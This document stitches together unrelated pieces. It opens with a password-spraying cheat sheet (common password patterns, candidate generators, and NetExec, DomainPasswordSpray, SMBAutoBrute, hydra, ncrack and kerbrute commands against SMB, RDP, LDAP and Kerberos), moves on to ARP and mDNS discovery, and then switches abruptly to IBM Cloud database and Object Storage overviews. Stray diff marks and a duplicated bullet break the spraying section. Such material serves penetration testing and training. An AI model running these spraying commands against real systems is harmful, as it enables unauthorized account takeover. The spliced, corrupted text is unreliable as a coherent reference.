## Password Spraying

Most of the time the best passwords to spray are:
- Passwords: `P@ssw0rd01`, `Password123`, `Password1`
- Common passwords: `Welcome1`/`Welcome01`, `Hello123`, `mimikatz`
- $Companyname1: `$Microsoft1`
- SeasonYear: `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!`
- Default AD password with simple mutations such as appending `1` or iterating special characters (`*`, `?`, `!`, `#`)
- Empty password: the NT hash is `31d6cfe0d16ae931b73c59d7e0c089c0`
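Candidate lists following the SeasonYear and special-character patterns above are small enough to generate on the fly. A minimal sketch in Python (an illustrative helper, not part of any tool referenced here):

```python
# Generate SeasonYear-style spray candidates with the simple mutations
# described above (optional trailing special character).
SEASONS = ["Winter", "Spring", "Summer", "Autumn"]
SPECIALS = ["", "*", "?", "!", "#"]

def season_year_candidates(years):
    """Yield candidates like Winter2019* for each season/year/suffix combo."""
    for year in years:
        for season in SEASONS:
            for special in SPECIALS:
                yield f"{season}{year}{special}"

candidates = list(season_year_candidates([2019, 2020]))
print(len(candidates))   # 4 seasons x 2 years x 5 suffixes = 40
```

Feed the resulting list to any of the spraying tools below in place of a static wordlist.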

:warning: Be careful with the account lockout!
## Spray a pre-generated passwords list

* Using [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) to spray credentials against network services.
```powershell
nxc smb 10.0.0.1 -u /path/to/users.txt -p Password123
nxc smb 10.0.0.1 -u Administrator -p /path/to/passwords.txt

nxc smb targets.txt -u Administrator -p Password123 -d domain.local
nxc ldap targets.txt -u Administrator -p Password123 -d domain.local
nxc rdp targets.txt -u Administrator -p Password123 -d domain.local
nxc winrm targets.txt -u Administrator -p Password123 -d domain.local
nxc mssql targets.txt -u Administrator -p Password123 -d domain.local
nxc wmi targets.txt -u Administrator -p Password123 -d domain.local

nxc ssh targets.txt -u Administrator -p Password123
nxc vnc targets.txt -u Administrator -p Password123
nxc ftp targets.txt -u Administrator -p Password123
nxc nfs targets.txt -u Administrator -p Password123
```

* Using [hashcat/maskprocessor](https://github.com/hashcat/maskprocessor) to generate passwords following a specific rule

```powershell
nxc smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```
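maskprocessor masks use built-in charsets: `?l` lowercase, `?u` uppercase, `?d` digits, `?s` specials, and `?a` = all of those combined. A rough Python re-implementation of the expansion, just to show what a mask such as `Pass@wor?l?a` produces (a sketch for illustration; use `mp64.bin` for real runs):

```python
from itertools import product
import string

# maskprocessor-style charsets: ?l lower, ?u upper, ?d digits,
# ?s specials (space + punctuation), ?a = ?l?u?d?s (95 characters).
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]

def expand_mask(mask):
    """Expand a mask like 'Pass@wor?l?a' into all candidate passwords."""
    parts, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            parts.append(CHARSETS[mask[i + 1]])   # charset placeholder
            i += 2
        else:
            parts.append(mask[i])                 # literal character
            i += 1
    for combo in product(*parts):
        yield "".join(combo)

candidates = list(expand_mask("Pass@wor?l?a"))
print(len(candidates))   # 26 * 95 = 2470 candidates
```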

* Using [dafthack/DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) to spray a password against all users of a domain.

```powershell
Invoke-DomainPasswordSpray -Password Summer2021!
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
```
||||||
* Using `SMBAutoBrute`.
|
|
||||||
|
* Using [shellntel-acct/scripts/SMBAutoBrute](https://github.com/shellntel-acct/scripts/blob/master/Invoke-SMBAutoBrute.ps1).
|
||||||
```powershell
|
```powershell
|
||||||
|
Invoke-SMBAutoBrute -PasswordList "jennifer, yankees" -LockoutThreshold 3
|
||||||
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||

## Spray passwords against the RDP service

* Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.

```powershell
git clone https://github.com/xFreed0m/RDPassSpray
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
```

* Using [hydra](https://github.com/vanhauser-thc/thc-hydra) and [ncrack](https://github.com/nmap/ncrack) to target RDP services.

```powershell
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
ncrack --connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```

## BadPwdCount attribute

> The number of times the user tried to log on to the account using an incorrect password. A value of `0` indicates that the value is unknown.

```powershell
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
```
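Before spraying, `badpwdcount` values like the ones above can be used to skip accounts that are already close to the lockout threshold. A hedged sketch (the line format is assumed to match the `netexec` output shown above; the `margin` heuristic is illustrative, not a tool feature):

```python
import re

# Parse lines like:
# LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LINE = re.compile(r"^LDAP\s+\S+\s+\d+\s+\S+\s+(\S+)\s+badpwdcount:\s+(\d+)")

def safe_targets(output, lockout_threshold, margin=2):
    """Return users whose badPwdCount leaves at least `margin` attempts
    before the domain lockout threshold would be reached."""
    users = []
    for line in output.splitlines():
        m = LINE.match(line.strip())
        if m and int(m.group(2)) <= lockout_threshold - margin:
            users.append(m.group(1))
    return users

output = """\
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 4 pwdLastSet: <never>"""
print(safe_targets(output, lockout_threshold=5))   # ['Guest']
```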

## Kerberos pre-auth bruteforcing

Using [ropnop/kerbrute](https://github.com/ropnop/kerbrute), a tool to perform Kerberos pre-auth bruteforcing.

> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with a specific **Kerberos pre-authentication failure (4771)** event.

* Username bruteforce

```powershell
./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
```

* Password bruteforce

```powershell
./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
```

* Password spray

```powershell
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
```
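`--delay` inserts a pause (in milliseconds) between attempts, so a spray's minimum runtime is easy to estimate up front. Simple arithmetic, not a kerbrute feature:

```python
def spray_duration_seconds(num_users, delay_ms):
    """Lower bound on runtime: one attempt per user, delay_ms between attempts."""
    return num_users * delay_ms / 1000

# e.g. spraying one password over 3000 users with --delay 100
print(spray_duration_seconds(3000, 100))  # 300.0 seconds
```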

## MDNS

MDNS works by using multicast addresses to send DNS queries and responses.

```ps1
mdns-scan
```

## ARP

ARP (Address Resolution Protocol) is a networking protocol used to map IP addresses to MAC (Media Access Control) addresses on a local area network (LAN).
* ARP neighbors

```ps1
:~$ ip neigh
192.168.122.1 dev enp1s0 lladdr 52:54:00:ff:0a:2c STALE
192.168.122.98 dev enp1s0 lladdr 52:54:00:ff:aa:bb STALE
```
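The `ip neigh` table above is easy to consume from a script. A small illustrative parser (it assumes the standard `iproute2` output format shown above):

```python
# Parse `ip neigh` output lines like:
# 192.168.122.1 dev enp1s0 lladdr 52:54:00:ff:0a:2c STALE
def parse_ip_neigh(output):
    """Map IP -> (interface, MAC, state) from `ip neigh` output."""
    table = {}
    for line in output.splitlines():
        fields = line.split()
        if "lladdr" in fields:                       # skip FAILED/incomplete entries
            ip = fields[0]
            dev = fields[fields.index("dev") + 1]
            mac = fields[fields.index("lladdr") + 1]
            table[ip] = (dev, mac, fields[-1])
    return table

sample = """\
192.168.122.1 dev enp1s0 lladdr 52:54:00:ff:0a:2c STALE
192.168.122.98 dev enp1s0 lladdr 52:54:00:ff:aa:bb STALE"""
print(parse_ip_neigh(sample)["192.168.122.1"])
```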

* ARP scan with `nmap` (needs root privileges; check what packets nmap is sending with `--packet-trace`)

```ps1
:~# nmap -sn -n 192.168.122.0/24

Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 192.168.122.1
Host is up (0.00032s latency).
MAC Address: 52:54:00:FF:0A:2C (QEMU virtual NIC)
```

* ARP scan with `arp-scan`

```ps1
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
```

# IBM Cloud Managed Database Services

IBM Cloud offers a variety of managed database services that allow organizations to easily deploy, manage, and scale databases without the operational overhead. These services ensure high availability, security, and performance, catering to a wide range of application requirements.

## Supported Database Engines

### 1. PostgreSQL

- **Description**: PostgreSQL is an open-source relational database known for its robustness, extensibility, and SQL compliance. It supports advanced data types and offers features like complex queries, ACID compliance, and full-text search.

- **Key Features**:
  - Automated backups and recovery
  - High availability with clustering options
  - Scale horizontally and vertically with ease
  - Support for JSON and unstructured data
  - Advanced security features including encryption

- **Use Cases**:
  - Web applications
  - Data analytics
  - Geospatial data applications
  - E-commerce platforms

#### Connecting to PostgreSQL

You can connect to a PostgreSQL database using various programming languages. Here's an example in Python using the `psycopg2` library.

```python
import psycopg2

# Establishing a connection to the PostgreSQL database
conn = psycopg2.connect(
    dbname="your_database_name",
    user="your_username",
    password="your_password",
    host="your_host",
    port="your_port"
)
cursor = conn.cursor()

# Example of a simple query
cursor.execute("SELECT * FROM your_table;")
records = cursor.fetchall()
print(records)

# Closing the connection
cursor.close()
conn.close()
```
### 2. MongoDB

- **Description**: MongoDB is a leading NoSQL database that provides a flexible data model, enabling developers to work with unstructured data and large volumes of data. It uses a document-oriented data model and is designed for scalability and performance.

- **Key Features**:
  - Automatic sharding for horizontal scaling
  - Built-in replication for high availability
  - Rich querying capabilities and indexing options
  - Full-text search and aggregation framework
  - Flexible schema design

- **Use Cases**:
  - Content management systems
  - Real-time analytics
  - Internet of Things (IoT) applications
  - Mobile applications

#### Connecting to MongoDB

You can connect to MongoDB using various programming languages. Here's an example in JavaScript using the `mongodb` library.

```javascript
const { MongoClient } = require('mongodb');

// Connection URI
const uri = "mongodb://your_username:your_password@your_host:your_port/your_database";

// Create a new MongoClient
const client = new MongoClient(uri);

async function run() {
  try {
    // Connect to the MongoDB cluster
    await client.connect();

    // Access the database
    const database = client.db('your_database');
    const collection = database.collection('your_collection');

    // Example of a simple query
    const query = { name: "John Doe" };
    const user = await collection.findOne(query);
    console.log(user);
  } finally {
    // Ensures that the client will close when you finish/error
    await client.close();
  }
}

run().catch(console.dir);
```

## Benefits of Using IBM Cloud Managed Database Services

- **Automated Management**: Reduce operational overhead with automated backups, scaling, and updates.
- **High Availability**: Built-in redundancy and failover mechanisms ensure uptime and data availability.
- **Security**: Comprehensive security features protect your data with encryption, access controls, and compliance support.
- **Scalability**: Easily scale your database resources up or down based on application needs.
- **Performance Monitoring**: Built-in monitoring and alerting tools provide insights into database performance and health.

## Getting Started

To begin using IBM Cloud Managed Database services, follow these steps:

1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Select Database Service**: Choose the managed database service you need (PostgreSQL, MongoDB, etc.).
3. **Configure Your Database**: Set up your database parameters, including region, storage size, and instance type.
4. **Deploy**: Launch your database instance with a few clicks.
5. **Connect**: Use the provided connection string to connect your applications to the database.

## Conclusion

IBM Cloud's managed database services provide a reliable and efficient way to manage your database needs. With support for leading databases like PostgreSQL and MongoDB, organizations can focus on building innovative applications while leveraging IBM's infrastructure and expertise.

## Additional Resources

- [IBM Cloud Databases Documentation](https://cloud.ibm.com/docs/databases?code=cloud)
- [IBM Cloud PostgreSQL Documentation](https://cloud.ibm.com/docs/databases?code=postgres)
- [IBM Cloud MongoDB Documentation](https://cloud.ibm.com/docs/databases?code=mongo)

# IBM Cloud Object Storage

IBM Cloud Object Storage is a highly scalable, secure, and durable cloud storage service designed for storing and accessing unstructured data like images, videos, backups, and documents. With the ability to scale seamlessly based on the data volume, IBM Cloud Object Storage is ideal for handling large-scale data storage needs, such as archiving, backup, and modern applications like AI and machine learning workloads.

## Key Features

### 1. **Scalability**

- **Dynamic Scaling**: IBM Cloud Object Storage can grow dynamically with your data needs, ensuring you never run out of storage space. There's no need for pre-provisioning or capacity planning, as it scales automatically based on demand.
- **No Size Limits**: Store an unlimited amount of data, from kilobytes to petabytes, without constraints.

### 2. **High Durability and Availability**

- **Redundancy**: Data is automatically distributed across multiple regions and availability zones to ensure that it remains available and protected, even in the event of failures.
- **99.999999999% Durability (11 nines)**: IBM Cloud Object Storage provides enterprise-grade durability, meaning that your data is safe and recoverable.

### 3. **Flexible Storage Classes**

IBM Cloud Object Storage offers multiple storage classes, allowing you to choose the right balance between performance and cost:

- **Standard**: For frequently accessed data, providing high performance and low latency.
- **Vault**: For infrequently accessed data with lower storage costs.
- **Cold Vault**: For long-term storage of rarely accessed data, such as archives.
- **Smart Tier**: Automatically optimizes storage costs by tiering objects based on access patterns.
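The storage classes above map naturally to expected access frequency. As a rough illustration only (the thresholds below are hypothetical, not an IBM pricing rule), a helper that picks a class from expected accesses per month might look like:

```python
def suggest_storage_class(accesses_per_month):
    """Suggest a storage class from expected access frequency.
    Thresholds are illustrative, not IBM-defined."""
    if accesses_per_month >= 30:
        return "Standard"      # frequently accessed, low latency
    if accesses_per_month >= 1:
        return "Vault"         # infrequently accessed, lower cost
    return "Cold Vault"        # rarely accessed / archival

print(suggest_storage_class(100))  # Standard
print(suggest_storage_class(2))    # Vault
print(suggest_storage_class(0))    # Cold Vault
```

In practice, the Smart Tier class automates exactly this decision based on observed access patterns, so an explicit chooser is only needed when you manage tiering yourself.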

### 4. **Secure and Compliant**

- **Encryption**: Data is encrypted at rest and in transit using robust encryption standards.
- **Access Controls**: Fine-grained access policies using IBM Identity and Access Management (IAM) allow you to control who can access your data.
- **Compliance**: Meets a wide range of industry standards and regulatory requirements, including GDPR, HIPAA, and ISO certifications.

### 5. **Cost-Effective**

- **Pay-as-You-Go**: With IBM Cloud Object Storage, you only pay for the storage and features you use, making it cost-effective for a variety of workloads.
- **Data Lifecycle Policies**: Automate data movement between storage classes to optimize costs over time based on data access patterns.

### 6. **Global Accessibility**

- **Multi-Regional Replication**: Distribute your data across multiple regions for greater accessibility and redundancy.
- **Low Latency**: Access your data with minimal latency, no matter where your users or applications are located globally.

### 7. **Integration with IBM Cloud Services**

IBM Cloud Object Storage integrates seamlessly with a wide range of IBM Cloud services, including:

- **IBM Watson AI**: Store and manage data used in AI and machine learning workloads.
- **IBM Cloud Functions**: Use serverless computing to trigger actions when new objects are uploaded.
- **IBM Kubernetes Service**: Persistent storage for containers and microservices applications.

## Use Cases

1. **Backup and Archiving**:
   - IBM Cloud Object Storage is ideal for long-term storage of backups and archived data due to its durability and cost-efficient pricing models. Data lifecycle policies automate the movement of less-frequently accessed data to lower-cost storage classes like Vault and Cold Vault.

2. **Content Delivery**:
   - Serve media files like images, videos, and documents to global users with minimal latency using IBM Cloud Object Storage's multi-regional replication and global accessibility.

3. **Big Data and Analytics**:
   - Store large datasets and logs for analytics applications. IBM Cloud Object Storage can handle vast amounts of data, which can be processed using IBM analytics services or machine learning models.

4. **Disaster Recovery**:
   - Ensure business continuity by storing critical data redundantly across multiple locations, allowing you to recover from disasters or data loss events.

5. **AI and Machine Learning**:
   - Store and manage training datasets for machine learning and AI applications. IBM Cloud Object Storage integrates directly with IBM Watson and other AI services, providing scalable storage for vast datasets.

## Code Example: Uploading and Retrieving Data

Here's an example using Python and the IBM Cloud SDK to upload and retrieve an object from IBM Cloud Object Storage.

### 1. **Installation**:

Install the IBM Cloud Object Storage SDK for Python:

```bash
pip install ibm-cos-sdk
```

### 2. **Uploading an Object**:

```python
import ibm_boto3
from ibm_botocore.client import Config

# Initialize the client
cos = ibm_boto3.client('s3',
    ibm_api_key_id='your_api_key',
    ibm_service_instance_id='your_service_instance_id',
    config=Config(signature_version='oauth'),
    endpoint_url='https://s3.us.cloud-object-storage.appdomain.cloud')

# Upload a file
cos.upload_file(Filename='example.txt', Bucket='your_bucket_name', Key='example.txt')

print('File uploaded successfully.')
```

### 3. **Retrieving an Object**:

```python
# Download an object
cos.download_file(Bucket='your_bucket_name', Key='example.txt', Filename='downloaded_example.txt')

print('File downloaded successfully.')
```

### Configuring IBM Cloud Object Storage

To start using IBM Cloud Object Storage, follow these steps:

1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Create Object Storage**: In the IBM Cloud console, navigate to **Catalog** > **Storage** > **Object Storage**, and follow the steps to create an instance.
3. **Create Buckets**: After creating an instance, you can create storage containers (buckets) to store your objects. Buckets are where data is logically stored.
4. **Manage Access**: Define access policies using IBM IAM for your Object Storage buckets.
5. **Connect and Use**: Use the provided API keys and endpoints to connect to your Object Storage instance and manage your data.

## Conclusion

IBM Cloud Object Storage offers a highly scalable, durable, and cost-effective storage solution for various types of workloads, from simple backups to complex AI and big data applications. With features like lifecycle management, security, and integration with other IBM Cloud services, it's a flexible choice for any organization looking to manage unstructured data efficiently.